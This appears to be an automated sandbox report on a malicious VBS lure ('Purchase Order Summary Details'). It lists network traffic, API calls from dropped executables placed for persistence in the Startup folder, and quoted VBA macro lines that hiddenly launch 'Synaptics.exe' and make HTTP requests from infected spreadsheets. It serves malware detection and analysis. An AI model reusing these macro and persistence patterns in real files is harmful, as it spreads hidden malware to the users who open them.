                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49743 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49744 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49750 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49749 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49751 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49752 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49755 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49772 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49775 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49778 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49776 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49795 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49794 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49798 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49796 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49804 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49809 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49808 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49813 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49819 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49826 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49827 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49831 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49832 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49839 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49838 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49851 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49862 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49866 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49913 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49914 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49915 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49921 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49947 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49946 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49948 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49958 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49959 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49968 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49970 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49992 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49993 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50019 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50021 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50029 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50034 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50057 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50056 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50067 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50066 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50068 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50069 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50109 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:50111 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50122 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50123 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50133 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50132 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50156 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50157 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50168 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50169 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50196 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50197 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50221 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:50222 version: TLS 1.2
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F67099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_00F67099
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F67294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00F67294
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DB7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00DB7294
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F67294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,23_2_00F67294
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F67099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,7_2_00F67099
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F54342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,7_2_00F54342
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_00F7F5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 16_2_00DCF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00DCF5D0
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 23_2_00F7F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,23_2_00F7F5D0

                              System Summary

                              barindex
                              Document contains an embedded VBA macro with suspicious strings
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: zuYOpErC.xlsm.10.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: WUTJSCBCFX.xlsm.10.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Document contains an embedded VBA with functions possibly related to ADO stream file operations
                              Source: zuYOpErC.xlsm.10.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: WUTJSCBCFX.xlsm.10.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Document contains an embedded VBA with functions possibly related to HTTP operations
                              Source: zuYOpErC.xlsm.10.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: WUTJSCBCFX.xlsm.10.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                              Source: zuYOpErC.xlsm.10.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: WUTJSCBCFX.xlsm.10.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Sample has a suspicious name (potential lure to open the executable)
                              Source: Purchase Order Summary Details.vbsStatic file information: Suspicious name
                              Windows Scripting host queries suspicious COM object (likely to drop second stage)
                              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F129C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,7_2_00F129C2
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F802AA NtdllDialogWndProc_W,7_2_00F802AA
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7E769 NtdllDialogWndProc_W,CallWindowProcW,7_2_00F7E769
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7EA4E NtdllDialogWndProc_W,7_2_00F7EA4E
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,7_2_00F7ECBC
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2AC99 NtdllDialogWndProc_W,7_2_00F2AC99
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,7_2_00F2AD5C
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F2AFB4 GetParent,NtdllDialogWndProc_W,7_2_00F2AFB4
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,7_2_00F7EFA8
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F0A1 SendMessageW,NtdllDialogWndProc_W,7_2_00F7F0A1
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,7_2_00F7F122
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F3DA NtdllDialogWndProc_W,7_2_00F7F3DA
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 7_2_00F7F3AB NtdllDialogWndProc_W,7_2_00F7F3AB
